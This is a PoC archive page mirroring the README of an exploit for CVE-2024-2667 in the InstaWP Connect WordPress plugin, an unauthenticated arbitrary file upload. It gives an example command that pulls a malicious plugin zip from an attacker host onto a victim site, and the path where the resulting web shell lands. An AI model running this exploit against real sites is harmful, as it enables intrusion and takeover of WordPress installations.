Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-2667 PoC — WordPress plugin InstaWP Connect 安全漏洞

Source
https://github.com/Nxploited/CVE-2024-2667-Poc
Associated Vulnerability
Title:WordPress plugin InstaWP Connect 安全漏洞 (CVE-2024-2667)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin InstaWP Connect 0.1.0.22 版本及之前版本存在安全漏洞,该漏洞源于 /wp-json/instawp-connect/v1/config REST API 端点中的文件验证不足,导致任意文件上传。
Readme
# CVE-2024-2667-Poc 🚀

## Description
The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.

# Script Usage Guide ⚙️

### Install Requirements
| Description                                | Details                                                                                     | Icon  |
|--------------------------------------------|---------------------------------------------------------------------------------------------|-------|
| Install Required Libraries                 | Use `pip` to install the necessary Python libraries: `requests` and `beautifulsoup4`.      | 🛠️   |
| Command to Install                         | Run: `pip install requests beautifulsoup4`.                                                | 📥   |

### Run the Script
| Description                                | Details                                                                                     | Icon  |
|--------------------------------------------|---------------------------------------------------------------------------------------------|-------|
| Execute the Script                         | Run the script using the command line with required arguments.                              | 🚀   |
| Required Arguments                         | - `-up`: Plugin URL (e.g., `http://attacker-domain/malicious-plugin.zip`).                  |
|                                            | - `-u`: Target WordPress URL (e.g., `http://victim-domain/`).                               | 🔧   |
| Example Command                            | `python CVE-2024-2667.py -up http://attacker-domain/malicious-plugin.zip -u http://victim-domain/`   | 📜   |

### Check Vulnerability
| Description                                | Details                                                                                     | Icon  |
|--------------------------------------------|---------------------------------------------------------------------------------------------|-------|
| Version Check                              | The script examines the `readme.txt` file for the version of the target plugin.             | 🔍   |
| Vulnerable Version                         | If the version is `<= 0.1.0.22`, the script prints: `The site is vulnerable.`              | ⚠️   |
| Safe Version                                | If the version is `> 0.1.0.22`, the script prints: `The site is not vulnerable.`            | ✅   |


###  Shell Location
| Description                                | Details                                                                                     | Icon  |
|--------------------------------------------|---------------------------------------------------------------------------------------------|-------|
| Shell Path                                 | If the upload is successful, the shell will be accessible at:                               | 🐚   |
|                                            | `wp-content/plugins/instawp-connect/shell.php`.                                             |








### usage -help
```
usage: CVE-2024-2667.py [-h] -up URL_PLUGIN -u URL_TARGET

The InstaWP Connect – 1-click WP Staging & Migration plugin for WordPress is vulnerable to arbitrary file uploads due
to insufficient file validation in the /wp-json/instawp-connect/v1/config REST API endpoint in all versions up to, and
including, 0.1.0.22. This makes it possible for unauthenticated attackers to upload arbitrary files.

options:
  -h, --help            show this help message and exit
  -up URL_PLUGIN, --url_plugin URL_PLUGIN
                        URL of the plugin (e.g., http://attacker-domain/malicious-plugin.zip).
  -u URL_TARGET, --url_target URL_TARGET
                        URL of the target WordPress site (e.g., http://victim-domain/).
```
File Snapshot

 [4.0K]  /data/pocs/1c0bda3e837011da963e42896142f7aff1a8461f
├── [3.1K]  CVE-2024-2667.py
└── [4.0K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.